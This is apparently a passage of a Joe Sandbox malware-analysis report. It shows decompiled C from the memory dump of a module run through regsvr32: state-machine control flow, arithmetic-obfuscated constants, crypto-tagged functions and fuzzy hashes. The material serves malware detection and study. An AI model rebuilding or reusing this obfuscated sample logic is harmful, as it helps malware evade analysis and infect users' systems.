				_v124 = _v124 + 0xffff2079;
				_v124 = _v124 ^ 0x000c21db;
				_v116 = 0x54d058;
				_v116 = _v116 | 0x16fcd649;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0xb7eba66c;
				_v96 = 0xde7508;
				_v96 = _v96 | 0x62922a1e;
				_v96 = _v96 ^ 0x62dd35db;
				_v104 = 0x604f99;
				_v104 = _v104 << 0xd;
				_v104 = _v104 ^ 0x09fd2078;
				_v108 = 0xc4a9bc;
				_t253 = 0x39;
				_v108 = _v108 / _t253;
				_v108 = _v108 ^ 0x000ac116;
				_v140 = 0x735c94;
				_v140 = _v140 + 0x7295;
				_v140 = _v140 ^ 0xc45e4222;
				_v140 = _v140 * 0x1c;
				_v140 = _v140 ^ 0x74f018e0;
				_v88 = 0x4dc8ff;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0xdc83807a;
				goto L1;
				do {
					while(1) {
						L1:
						_t291 = _t256 - 0x4c0c206;
						if(_t291 > 0) {
							break;
						}
						if(_t291 == 0) {
							E001A4E8F(_t286 + 0x1c,  &_v60, __eflags, _v140, _v88);
						} else {
							if(_t256 == 0x120f8e0) {
								_push(_t256);
								_t242 = E001A303A(_t256, _t285[1]);
								_t289 =  &(_t289[3]);
								 *_t285 = _t242;
								__eflags = _t242;
								if(__eflags != 0) {
									_t256 = 0xb738352;
									continue;
								}
							} else {
								if(_t256 == 0x271f41d) {
									E001AE4D8(_v160,  *((intOrPtr*)(_t286 + 0x48)),  &_v60, _v80);
									_t289 =  &(_t289[2]);
									_t256 = 0x3e9745f;
									continue;
								} else {
									if(_t256 == 0x3e9745f) {
										E001AE4D8(_v120,  *((intOrPtr*)(_t286 + 0x24)),  &_v60, _v100);
										_t289 =  &(_t289[2]);
										_t256 = 0x43c3571;
										continue;
									} else {
										if(_t256 == 0x43c3571) {
											E001AE4D8(_v128,  *((intOrPtr*)(_t286 + 0x3c)),  &_v60, _v124);
											_t289 =  &(_t289[2]);
											_t256 = 0x62d2c19;
											continue;
										} else {
											if(_t256 != 0x45a5391) {
												goto L24;
											} else {
												_t285[1] = E001A1DCA(_t286);
												_t256 = 0x120f8e0;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t285;
						_t212 =  *_t285 != 0;
						__eflags = _t212;
						return 0 | _t212;
					}
					__eflags = _t256 - 0x62d2c19;
					if(_t256 == 0x62d2c19) {
						E001AE4D8(_v116,  *((intOrPtr*)(_t286 + 0xc)),  &_v60, _v96);
						_t289 =  &(_t289[2]);
						_t256 = 0x77ec616;
						goto L24;
					} else {
						__eflags = _t256 - 0x6eaba5f;
						if(__eflags == 0) {
							_t256 = 0x45a5391;
							 *_t285 = 0;
							_t285[1] = _v148;
							goto L1;
						} else {
							__eflags = _t256 - 0x77ec616;
							if(_t256 == 0x77ec616) {
								E001AE4D8(_v104,  *((intOrPtr*)(_t286 + 0x28)),  &_v60, _v108);
								_t289 =  &(_t289[2]);
								_t256 = 0x4c0c206;
								goto L1;
							} else {
								__eflags = _t256 - 0xb738352;
								if(_t256 == 0xb738352) {
									E001A6DD9( &_v60, _v156, _v92, _t285, _v164);
									_t289 =  &(_t289[3]);
									_t256 = 0xd6a58b7;
									goto L1;
								} else {
									__eflags = _t256 - 0xd6a58b7;
									if(__eflags != 0) {
										goto L24;
									} else {
										E001A4E8F(_t286 + 0x10,  &_v60, __eflags, _v152, _v144);
										_t256 = 0x271f41d;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t256 - 0x8f7bf09;
				} while (__eflags != 0);
				goto L27;
			}







































                                                                                                                0x001ae663
                                                                                                                0x001ae66b
                                                                                                                0x001ae672
                                                                                                                0x001ae674
                                                                                                                0x001ae67b
                                                                                                                0x001ae67c
                                                                                                                0x001ae684
                                                                                                                0x001ae685
                                                                                                                0x001ae68a
                                                                                                                0x001ae697
                                                                                                                0x001ae6a2
                                                                                                                0x001ae6a5
                                                                                                                0x001ae6ab
                                                                                                                0x001ae6af
                                                                                                                0x001ae6b4
                                                                                                                0x001ae6bc
                                                                                                                0x001ae6c8
                                                                                                                0x001ae6c9
                                                                                                                0x001ae6d2
                                                                                                                0x001ae6d6
                                                                                                                0x001ae6de
                                                                                                                0x001ae6e6
                                                                                                                0x001ae6f0
                                                                                                                0x001ae6f4
                                                                                                                0x001ae6fc
                                                                                                                0x001ae704
                                                                                                                0x001ae709
                                                                                                                0x001ae711
                                                                                                                0x001ae719
                                                                                                                0x001ae721
                                                                                                                0x001ae726
                                                                                                                0x001ae72e
                                                                                                                0x001ae73c
                                                                                                                0x001ae740
                                                                                                                0x001ae748
                                                                                                                0x001ae750
                                                                                                                0x001ae758
                                                                                                                0x001ae765
                                                                                                                0x001ae769
                                                                                                                0x001ae771
                                                                                                                0x001ae779
                                                                                                                0x001ae781
                                                                                                                0x001ae789
                                                                                                                0x001ae791
                                                                                                                0x001ae796
                                                                                                                0x001ae79e
                                                                                                                0x001ae7a6
                                                                                                                0x001ae7ae
                                                                                                                0x001ae7b6
                                                                                                                0x001ae7c3
                                                                                                                0x001ae7c7
                                                                                                                0x001ae7cf
                                                                                                                0x001ae7d7
                                                                                                                0x001ae7df
                                                                                                                0x001ae7e7
                                                                                                                0x001ae7f4
                                                                                                                0x001ae7f8
                                                                                                                0x001ae800
                                                                                                                0x001ae808
                                                                                                                0x001ae815
                                                                                                                0x001ae819
                                                                                                                0x001ae821
                                                                                                                0x001ae829
                                                                                                                0x001ae831
                                                                                                                0x001ae836
                                                                                                                0x001ae840
                                                                                                                0x001ae848
                                                                                                                0x001ae850
                                                                                                                0x001ae855
                                                                                                                0x001ae85d
                                                                                                                0x001ae865
                                                                                                                0x001ae86d
                                                                                                                0x001ae875
                                                                                                                0x001ae87d
                                                                                                                0x001ae885
                                                                                                                0x001ae88d
                                                                                                                0x001ae895
                                                                                                                0x001ae8a3
                                                                                                                0x001ae8a8
                                                                                                                0x001ae8ae
                                                                                                                0x001ae8b6
                                                                                                                0x001ae8be
                                                                                                                0x001ae8c6
                                                                                                                0x001ae8ce
                                                                                                                0x001ae8d3
                                                                                                                0x001ae8db
                                                                                                                0x001ae8e3
                                                                                                                0x001ae8eb
                                                                                                                0x001ae8f3
                                                                                                                0x001ae8fb
                                                                                                                0x001ae900
                                                                                                                0x001ae908
                                                                                                                0x001ae914
                                                                                                                0x001ae91c
                                                                                                                0x001ae920
                                                                                                                0x001ae928
                                                                                                                0x001ae930
                                                                                                                0x001ae938
                                                                                                                0x001ae945
                                                                                                                0x001ae949
                                                                                                                0x001ae951
                                                                                                                0x001ae959
                                                                                                                0x001ae95e
                                                                                                                0x001ae95e
                                                                                                                0x001ae966
                                                                                                                0x001ae966
                                                                                                                0x001ae966
                                                                                                                0x001ae966
                                                                                                                0x001ae968
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ae96e
                                                                                                                0x001aeb32
                                                                                                                0x001ae974
                                                                                                                0x001ae97a
                                                                                                                0x001aea28
                                                                                                                0x001aea2d
                                                                                                                0x001aea32
                                                                                                                0x001aea35
                                                                                                                0x001aea37
                                                                                                                0x001aea39
                                                                                                                0x001aea3f
                                                                                                                0x00000000
                                                                                                                0x001aea3f
                                                                                                                0x001ae980
                                                                                                                0x001ae986
                                                                                                                0x001aea06
                                                                                                                0x001aea0b
                                                                                                                0x001aea0e
                                                                                                                0x00000000
                                                                                                                0x001ae988
                                                                                                                0x001ae98e
                                                                                                                0x001ae9e4
                                                                                                                0x001ae9e9
                                                                                                                0x001ae9ec
                                                                                                                0x00000000
                                                                                                                0x001ae990
                                                                                                                0x001ae996
                                                                                                                0x001ae9c5
                                                                                                                0x001ae9ca
                                                                                                                0x001ae9cd
                                                                                                                0x00000000
                                                                                                                0x001ae998
                                                                                                                0x001ae99e
                                                                                                                0x00000000
                                                                                                                0x001ae9a4
                                                                                                                0x001ae9ab
                                                                                                                0x001ae9ae
                                                                                                                0x00000000
                                                                                                                0x001ae9ae
                                                                                                                0x001ae99e
                                                                                                                0x001ae996
                                                                                                                0x001ae98e
                                                                                                                0x001ae986
                                                                                                                0x001ae97a
                                                                                                                0x001aeb39
                                                                                                                0x001aeb3b
                                                                                                                0x001aeb40
                                                                                                                0x001aeb40
                                                                                                                0x001aeb4a
                                                                                                                0x001aeb4a
                                                                                                                0x001aea49
                                                                                                                0x001aea4f
                                                                                                                0x001aeb05
                                                                                                                0x001aeb0a
                                                                                                                0x001aeb0d
                                                                                                                0x00000000
                                                                                                                0x001aea55
                                                                                                                0x001aea55
                                                                                                                0x001aea5b
                                                                                                                0x001aeae6
                                                                                                                0x001aeaeb
                                                                                                                0x001aeaed
                                                                                                                0x00000000
                                                                                                                0x001aea61
                                                                                                                0x001aea61
                                                                                                                0x001aea67
                                                                                                                0x001aead3
                                                                                                                0x001aead8
                                                                                                                0x001aeadb
                                                                                                                0x00000000
                                                                                                                0x001aea69
                                                                                                                0x001aea69
                                                                                                                0x001aea6f
                                                                                                                0x001aeab1
                                                                                                                0x001aeab6
                                                                                                                0x001aeab9
                                                                                                                0x00000000
                                                                                                                0x001aea71
                                                                                                                0x001aea71
                                                                                                                0x001aea77
                                                                                                                0x00000000
                                                                                                                0x001aea7d
                                                                                                                0x001aea8f
                                                                                                                0x001aea96
                                                                                                                0x00000000
                                                                                                                0x001aea96
                                                                                                                0x001aea77
                                                                                                                0x001aea6f
                                                                                                                0x001aea67
                                                                                                                0x001aea5b
                                                                                                                0x00000000
                                                                                                                0x001aeb12
                                                                                                                0x001aeb12
                                                                                                                0x001aeb12
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: rxj<$ajW$~0
                                                                                                                • API String ID: 0-4188916868
                                                                                                                • Opcode ID: acaebf906b5d1b4fb3e6917d85a80d437da6bad1f0f4abfd0e3e441dfc5d7667
                                                                                                                • Instruction ID: 0587d49a0e03f586e2396d6ad9a571e08ac89ea8d3029e334ad78c6c14c31dac
                                                                                                                • Opcode Fuzzy Hash: acaebf906b5d1b4fb3e6917d85a80d437da6bad1f0f4abfd0e3e441dfc5d7667
                                                                                                                • Instruction Fuzzy Hash: A0C132B54083819FC368CF64C58982FBBE1BBD9748F104A1EF29696261D7B1DA09CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B2B1F Relevance: 4.0, Strings: 3, Instructions: 242COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B2B1F(void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v16;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* __ecx;
				void* _t207;
				void* _t222;
				void* _t224;
				signed int _t225;
				char* _t227;
				signed int _t228;
				void* _t233;
				intOrPtr _t240;
				intOrPtr* _t243;
				void* _t245;
				signed int _t247;
				char _t249;
				intOrPtr _t268;
				intOrPtr* _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				void* _t275;
				void* _t276;

				_t243 = _a4;
				_t270 = _a8;
				_push(_a12);
				_push(_t270);
				_push(_t243);
				_push(__edx);
				E001AC98A(_t207);
				_v60 = 0x79b68b;
				_t268 = 0;
				_v56 = 0xb1fe25;
				_t276 = _t275 + 0x14;
				_v52 = 0;
				_v48 = 0;
				_t245 = 0x242b324;
				_v136 = 0xb38636;
				_v136 = _v136 << 2;
				_t271 = 0x18;
				_v136 = _v136 * 0x13;
				_v136 = _v136 ^ 0x354bd808;
				_v112 = 0x75a3bb;
				_v112 = _v112 ^ 0xd727154a;
				_v112 = _v112 ^ 0xd752b6e1;
				_v84 = 0x8762a3;
				_v84 = _v84 / _t271;
				_v84 = _v84 ^ 0x0009cb2b;
				_v100 = 0x8a2833;
				_t272 = 0x75;
				_v100 = _v100 * 0x52;
				_v100 = _v100 ^ 0x2c4d8f9d;
				_v128 = 0xd3bfc0;
				_v128 = _v128 | 0x134c25e2;
				_v128 = _v128 * 3;
				_v128 = _v128 ^ 0x3b9eef4b;
				_v116 = 0xf3fdea;
				_v116 = _v116 + 0xffff23cf;
				_v116 = _v116 ^ 0x3255c10c;
				_v116 = _v116 ^ 0x32af19b4;
				_v152 = 0x5ddc76;
				_v152 = _v152 >> 6;
				_v152 = _v152 / _t272;
				_v152 = _v152 | 0x262df334;
				_v152 = _v152 ^ 0x2622e53d;
				_v160 = 0xe8f531;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 ^ 0xb4500013;
				_v160 = _v160 * 0x77;
				_v160 = _v160 ^ 0xd13cdb6d;
				_v96 = 0xf013a7;
				_v96 = _v96 * 0x31;
				_v96 = _v96 ^ 0x2dfd3eec;
				_v80 = 0x3a7336;
				_v80 = _v80 | 0x0708e64f;
				_v80 = _v80 ^ 0x0733b505;
				_v92 = 0x53fd8;
				_v92 = _v92 + 0xffffd9ef;
				_v92 = _v92 ^ 0x000ce5b4;
				_v120 = 0xebbd57;
				_v120 = _v120 | 0xbe7bbe8e;
				_v120 = _v120 ^ 0xbefe083d;
				_v88 = 0x249d68;
				_v88 = _v88 | 0x3d36917a;
				_v88 = _v88 ^ 0x3d3dc3f9;
				_v132 = 0x4d07e8;
				_v132 = _v132 << 5;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0xd073c10f;
				_v140 = 0xba92b3;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x05d0d282;
				_v144 = 0xead0c7;
				_v144 = _v144 << 2;
				_t273 = 0x30;
				_v144 = _v144 / _t273;
				_v144 = _v144 ^ 0x00184719;
				_v108 = 0x41d9d7;
				_v108 = _v108 ^ 0x2bd481eb;
				_v108 = _v108 ^ 0x2b92631e;
				_v104 = 0xceffed;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xceff314f;
				_v164 = 0x28ec07;
				_v164 = _v164 + 0xffff32f8;
				_v164 = _v164 + 0xffff53e0;
				_v164 = _v164 + 0xffff9863;
				_v164 = _v164 ^ 0x002bb535;
				_v156 = 0x73fca4;
				_v156 = _v156 >> 5;
				_v156 = _v156 + 0x96c1;
				_v156 = _v156 + 0xe5d2;
				_v156 = _v156 ^ 0x0005e78b;
				_v148 = 0x4a0a40;
				_v148 = _v148 + 0x5892;
				_v148 = _v148 << 2;
				_v148 = _v148 ^ 0x012de197;
				_v124 = 0x519675;
				_v124 = _v124 ^ 0x8890b8b6;
				_v124 = _v124 ^ 0x88c54f1f;
				L1:
				while(_t245 != 0x1d5aa6) {
					if(_t245 == 0x242b324) {
						_t245 = 0x652537e;
						continue;
					}
					if(_t245 == 0x51985bf) {
						_t247 = _v80;
						_t224 = E001BDF2B(_t247,  &_v44, _v92,  &_v16, _v120, _v88);
						_t276 = _t276 + 0x10;
						if(_t224 != 0) {
							_push(_t247);
							_t240 = E001A303A(_t247, _v40);
							_t276 = _t276 + 0xc;
							 *_t270 = _t240;
							if(_t240 != 0) {
								E001BFD42(_v40, _v104, _v44, _v164,  *_t270, _v156);
								_t276 = _t276 + 0x10;
								 *((intOrPtr*)(_t270 + 4)) = _v40;
								_t268 = 1;
							}
						}
						_t245 = 0xa9973c9;
						continue;
					}
					if(_t245 == 0x652537e) {
						_t225 =  *((intOrPtr*)(_t243 + 4));
						_t249 =  *_t243;
						_v72 = _t225;
						_v76 = _t249;
						_t227 = _t225 - 1 + _t249;
						while(_t227 > _t249) {
							if( *_t227 == 0) {
								break;
							}
							_t227 = _t227 - 1;
						}
						_t228 = _t227 - _t249;
						_v72 = _t228;
						if(_t228 == 0) {
							L16:
							_t245 = 0xcc86d59;
							continue;
						}
						while(_v72 % _v112 != _v136) {
							_t179 =  &_v72;
							 *_t179 = _v72 - 1;
							if( *_t179 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t245 == 0xa9973c9) {
						E001B17D2(_v148, _v124, _v68);
						L28:
						return _t268;
					}
					if(_t245 != 0xcc86d59) {
						L25:
						if(_t245 != 0xd49aba2) {
							continue;
						}
						goto L28;
					}
					_t233 = E001BA916(_v84, _v100, _v128,  &_v68, _v116,  &_v76);
					_t276 = _t276 + 0x10;
					if(_t233 == 0) {
						goto L28;
					}
					_t245 = 0x1d5aa6;
				}
				_t222 = E001BCFA0( &_v44,  &_v68, _v160, _v96);
				_t276 = _t276 + 0xc;
				if(_t222 == 0) {
					_t245 = 0xa9973c9;
					goto L25;
				}
				_t245 = 0x51985bf;
				goto L1;
			}























































                                                                                                                0x001b2b26
                                                                                                                0x001b2b2f
                                                                                                                0x001b2b37
                                                                                                                0x001b2b3e
                                                                                                                0x001b2b3f
                                                                                                                0x001b2b40
                                                                                                                0x001b2b42
                                                                                                                0x001b2b47
                                                                                                                0x001b2b52
                                                                                                                0x001b2b54
                                                                                                                0x001b2b5f
                                                                                                                0x001b2b62
                                                                                                                0x001b2b6b
                                                                                                                0x001b2b72
                                                                                                                0x001b2b77
                                                                                                                0x001b2b7f
                                                                                                                0x001b2b8b
                                                                                                                0x001b2b8e
                                                                                                                0x001b2b92
                                                                                                                0x001b2b9a
                                                                                                                0x001b2ba2
                                                                                                                0x001b2baa
                                                                                                                0x001b2bb2
                                                                                                                0x001b2bc2
                                                                                                                0x001b2bc6
                                                                                                                0x001b2bce
                                                                                                                0x001b2bdb
                                                                                                                0x001b2bdc
                                                                                                                0x001b2be0
                                                                                                                0x001b2be8
                                                                                                                0x001b2bf0
                                                                                                                0x001b2bfd
                                                                                                                0x001b2c01
                                                                                                                0x001b2c09
                                                                                                                0x001b2c11
                                                                                                                0x001b2c19
                                                                                                                0x001b2c21
                                                                                                                0x001b2c29
                                                                                                                0x001b2c31
                                                                                                                0x001b2c3c
                                                                                                                0x001b2c40
                                                                                                                0x001b2c48
                                                                                                                0x001b2c50
                                                                                                                0x001b2c58
                                                                                                                0x001b2c5d
                                                                                                                0x001b2c6a
                                                                                                                0x001b2c6e
                                                                                                                0x001b2c76
                                                                                                                0x001b2c83
                                                                                                                0x001b2c87
                                                                                                                0x001b2c8f
                                                                                                                0x001b2c97
                                                                                                                0x001b2c9f
                                                                                                                0x001b2ca7
                                                                                                                0x001b2caf
                                                                                                                0x001b2cb7
                                                                                                                0x001b2cbf
                                                                                                                0x001b2cc7
                                                                                                                0x001b2ccf
                                                                                                                0x001b2cd7
                                                                                                                0x001b2cdf
                                                                                                                0x001b2ce7
                                                                                                                0x001b2cef
                                                                                                                0x001b2cf7
                                                                                                                0x001b2cfe
                                                                                                                0x001b2d03
                                                                                                                0x001b2d0b
                                                                                                                0x001b2d13
                                                                                                                0x001b2d18
                                                                                                                0x001b2d1d
                                                                                                                0x001b2d25
                                                                                                                0x001b2d2d
                                                                                                                0x001b2d38
                                                                                                                0x001b2d40
                                                                                                                0x001b2d44
                                                                                                                0x001b2d4c
                                                                                                                0x001b2d54
                                                                                                                0x001b2d5c
                                                                                                                0x001b2d64
                                                                                                                0x001b2d6c
                                                                                                                0x001b2d71
                                                                                                                0x001b2d79
                                                                                                                0x001b2d81
                                                                                                                0x001b2d89
                                                                                                                0x001b2d91
                                                                                                                0x001b2d99
                                                                                                                0x001b2da1
                                                                                                                0x001b2da9
                                                                                                                0x001b2dae
                                                                                                                0x001b2db6
                                                                                                                0x001b2dbe
                                                                                                                0x001b2dc6
                                                                                                                0x001b2dce
                                                                                                                0x001b2dd6
                                                                                                                0x001b2ddb
                                                                                                                0x001b2de3
                                                                                                                0x001b2deb
                                                                                                                0x001b2dfb
                                                                                                                0x00000000
                                                                                                                0x001b2e03
                                                                                                                0x001b2e15
                                                                                                                0x001b2f44
                                                                                                                0x00000000
                                                                                                                0x001b2f44
                                                                                                                0x001b2e21
                                                                                                                0x001b2ed5
                                                                                                                0x001b2ed9
                                                                                                                0x001b2ede
                                                                                                                0x001b2ee3
                                                                                                                0x001b2ef5
                                                                                                                0x001b2efe
                                                                                                                0x001b2f03
                                                                                                                0x001b2f06
                                                                                                                0x001b2f0a
                                                                                                                0x001b2f28
                                                                                                                0x001b2f36
                                                                                                                0x001b2f39
                                                                                                                0x001b2f3c
                                                                                                                0x001b2f3c
                                                                                                                0x001b2f0a
                                                                                                                0x001b2f3d
                                                                                                                0x00000000
                                                                                                                0x001b2f3d
                                                                                                                0x001b2e2d
                                                                                                                0x001b2e74
                                                                                                                0x001b2e77
                                                                                                                0x001b2e79
                                                                                                                0x001b2e7e
                                                                                                                0x001b2e82
                                                                                                                0x001b2e8c
                                                                                                                0x001b2e89
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b2e8b
                                                                                                                0x001b2e8b
                                                                                                                0x001b2e90
                                                                                                                0x001b2e92
                                                                                                                0x001b2e96
                                                                                                                0x001b2eb0
                                                                                                                0x001b2eb0
                                                                                                                0x00000000
                                                                                                                0x001b2eb0
                                                                                                                0x001b2e98
                                                                                                                0x001b2eaa
                                                                                                                0x001b2eaa
                                                                                                                0x001b2eae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b2eae
                                                                                                                0x00000000
                                                                                                                0x001b2e98
                                                                                                                0x001b2e31
                                                                                                                0x001b2f98
                                                                                                                0x001b2f9e
                                                                                                                0x001b2faa
                                                                                                                0x001b2faa
                                                                                                                0x001b2e3d
                                                                                                                0x001b2f7e
                                                                                                                0x001b2f84
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b2f8a
                                                                                                                0x001b2e5d
                                                                                                                0x001b2e62
                                                                                                                0x001b2e67
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b2e6d
                                                                                                                0x001b2e6d
                                                                                                                0x001b2f66
                                                                                                                0x001b2f6b
                                                                                                                0x001b2f70
                                                                                                                0x001b2f7c
                                                                                                                0x00000000
                                                                                                                0x001b2f7c
                                                                                                                0x001b2f72
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6s:$="&$@J
                                                                                                                • API String ID: 0-1291149906
                                                                                                                • Opcode ID: 721145b223498ec0f1a49e0d4607bde14810ad7390df8733dc3e63dc860cbfd8
                                                                                                                • Instruction ID: eafb7d50890a472cafb186c1e9aad026784198d3484158ad5de1f44be68ab2fb
                                                                                                                • Opcode Fuzzy Hash: 721145b223498ec0f1a49e0d4607bde14810ad7390df8733dc3e63dc860cbfd8
                                                                                                                • Instruction Fuzzy Hash: D4B10EB15083819FD768CF25C98A95BBBE1FB85348F50491EF69686220D7B1CA49CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001ACDE0 Relevance: 4.0, Strings: 3, Instructions: 229COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001ACDE0() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				void* _t248;
				short* _t255;
				intOrPtr _t257;
				void* _t261;
				void* _t264;
				intOrPtr _t266;
				signed int _t287;
				signed int _t288;
				signed int* _t291;

				_t291 =  &_v1152;
				_v1108 = 0xa5a072;
				_v1108 = _v1108 >> 0x10;
				_t264 = 0x58e823f;
				_t287 = 0x23;
				_v1108 = _v1108 / _t287;
				_v1108 = _v1108 ^ 0x00079851;
				_v1140 = 0xa745f3;
				_v1140 = _v1140 << 2;
				_v1140 = _v1140 ^ 0xe4542542;
				_v1140 = _v1140 << 8;
				_v1140 = _v1140 ^ 0xc93c6e99;
				_v1088 = 0x47d96d;
				_v1088 = _v1088 ^ 0x96571a65;
				_v1088 = _v1088 + 0xffffc45e;
				_v1088 = _v1088 ^ 0x961dce68;
				_v1152 = 0xc2e892;
				_v1152 = _v1152 << 0xf;
				_v1152 = _v1152 << 0xb;
				_v1152 = _v1152 >> 4;
				_v1152 = _v1152 ^ 0x048232a4;
				_v1116 = 0x5bc054;
				_v1116 = _v1116 * 0x72;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0335fcbc;
				_v1124 = 0xb9518;
				_v1124 = _v1124 * 0x35;
				_v1124 = _v1124 >> 2;
				_v1124 = _v1124 + 0xffff1680;
				_v1124 = _v1124 ^ 0x009dd958;
				_v1112 = 0x188cb2;
				_v1112 = _v1112 * 0x59;
				_v1112 = _v1112 << 8;
				_v1112 = _v1112 ^ 0x88e416c3;
				_v1064 = 0x2a62b3;
				_v1064 = _v1064 + 0x1903;
				_v1064 = _v1064 ^ 0x002036c0;
				_v1044 = 0xed530e;
				_v1044 = _v1044 | 0x424246f7;
				_v1044 = _v1044 ^ 0x42e11766;
				_v1144 = 0x94ec6d;
				_v1144 = _v1144 * 0x51;
				_v1144 = _v1144 << 0x10;
				_v1144 = _v1144 ^ 0x2672da44;
				_v1144 = _v1144 ^ 0xe80f2240;
				_v1100 = 0x4d77b6;
				_v1100 = _v1100 + 0x3e24;
				_v1100 = _v1100 << 0xa;
				_v1100 = _v1100 ^ 0x36d3b252;
				_v1056 = 0xddd661;
				_v1056 = _v1056 >> 0xc;
				_v1056 = _v1056 ^ 0x00045a8e;
				_v1092 = 0xb1c0a8;
				_v1092 = _v1092 >> 0xe;
				_v1092 = _v1092 | 0xd99f1716;
				_v1092 = _v1092 ^ 0xd99b4737;
				_v1136 = 0xb48c27;
				_v1136 = _v1136 + 0xfffff076;
				_v1136 = _v1136 | 0x057053e0;
				_v1136 = _v1136 + 0xffffe18d;
				_v1136 = _v1136 ^ 0x05f9701b;
				_v1048 = 0x33d44f;
				_v1048 = _v1048 * 0x55;
				_v1048 = _v1048 ^ 0x113761e1;
				_v1132 = 0x6ed9b3;
				_v1132 = _v1132 + 0xffff3a36;
				_v1132 = _v1132 + 0xfffff888;
				_v1132 = _v1132 | 0x6613894a;
				_v1132 = _v1132 ^ 0x667e2fc2;
				_v1072 = 0x16e957;
				_v1072 = _v1072 ^ 0x6da3d916;
				_v1072 = _v1072 ^ 0x6db7d6a4;
				_v1096 = 0x537b0f;
				_v1096 = _v1096 + 0x1263;
				_t288 = 0xf;
				_v1096 = _v1096 * 0x78;
				_v1096 = _v1096 ^ 0x2724813f;
				_v1148 = 0xc61690;
				_v1148 = _v1148 ^ 0x1cf8353e;
				_v1148 = _v1148 | 0x2f326404;
				_v1148 = _v1148 ^ 0xf9102228;
				_v1148 = _v1148 ^ 0xc62f3d14;
				_v1104 = 0x7fc141;
				_v1104 = _v1104 | 0xaf92f3d7;
				_v1104 = _v1104 ^ 0xaff9034c;
				_v1080 = 0x4870ca;
				_v1080 = _v1080 * 0x3d;
				_v1080 = _v1080 ^ 0x114e5793;
				_v1068 = 0x7f9ab0;
				_v1068 = _v1068 << 0xf;
				_v1068 = _v1068 ^ 0xcd53ab4f;
				_v1076 = 0x85c708;
				_v1076 = _v1076 ^ 0x1235911e;
				_v1076 = _v1076 ^ 0x12b8a192;
				_v1128 = 0x79f20c;
				_v1128 = _v1128 / _t288;
				_v1128 = _v1128 << 0xb;
				_v1128 = _v1128 * 0x3b;
				_v1128 = _v1128 ^ 0xfd3bc06c;
				_v1052 = 0x5690ae;
				_v1052 = _v1052 + 0xffff34ef;
				_v1052 = _v1052 ^ 0x0052cbf9;
				_v1120 = 0xb8f20d;
				_v1120 = _v1120 + 0x9a25;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 + 0x9c1e;
				_v1120 = _v1120 ^ 0x00256f46;
				_v1060 = 0xa999ad;
				_v1060 = _v1060 << 0xc;
				_v1060 = _v1060 ^ 0x999b604f;
				_v1084 = 0xcb8c6b;
				_v1084 = _v1084 | 0xfbfafbf7;
